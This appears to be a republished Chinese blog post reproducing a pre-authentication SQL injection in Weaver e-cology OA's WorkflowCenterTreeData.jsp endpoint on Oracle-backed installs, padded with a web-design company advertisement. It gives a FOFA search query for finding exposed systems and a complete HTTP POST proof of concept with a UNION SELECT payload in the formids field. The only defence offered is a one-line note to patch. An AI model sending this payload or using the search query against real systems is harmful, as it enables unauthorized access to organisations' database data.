e-cologyOA前台SQL注入漏洞复现是怎样的
这篇文章给大家介绍e-cology OA前台SQL注入漏洞复现是怎样的,内容非常详细,感兴趣的小伙伴们可以参考借鉴,希望对大家能有所帮助。
成都创新互联公司长期为上千余家客户提供的网站建设服务,团队从业经验10年,关注不同地域、不同群体,并针对不同对象提供差异化的产品和服务;打造开放共赢平台,与合作伙伴共同营造健康的互联网生态环境。为文山州企业提供专业的成都网站制作、成都网站设计,文山州网站改版等技术服务。拥有10多年丰富建站经验和众多成功案例,为您定制开发。
0x00 简介
e-cology 提供了移动办公、微信办公、协同办公(OA)、流程管理、信息门户、知识管理、费控管理等功能,适用于手机和pc端,是当今比较主流的OA系统之一。
0x01 原理概述
该漏洞是由于OA系统的WorkflowCenterTreeData接口在收到用户输入的时候未进行安全过滤,oracle数据库传入恶意SQL语句,导致SQL漏洞。
0x02 影响范围
使用oracle数据库的泛微 e-cology OA 系统
0x03 环境搭建
在线环境(限今晚):
打赏(任意金额)+转发,联系作者获取
FOFA搜索:
app="泛微-协同办公OA"
自行搭建:
公众号内回复“泛微环境”
0x04 漏洞利用
找到oracle数据库的泛微OA系统后直接使用Poc(已公开)
如果不存在漏洞,则显示结果如下
如果漏洞存在,则会直接回显很多数据
简洁版Poc如下:(勿用于非法途径)
POST /mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333 HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 2236
Connection: close
Upgrade-Insecure-Requests: 1
formids=11111111111)))%0a%0dunion select NULL,value from v$parameter order by (((1
0x05 修复建议
官网已更新补丁,请尽快更新。
关于e-cology OA前台SQL注入漏洞复现是怎样的就分享到这里了,希望以上内容可以对大家有一定的帮助,可以学到更多知识。如果觉得文章不错,可以把它分享出去让更多的人看到。
当前文章:e-cologyOA前台SQL注入漏洞复现是怎样的
当前网址:http://myzitong.com/article/pjggei.html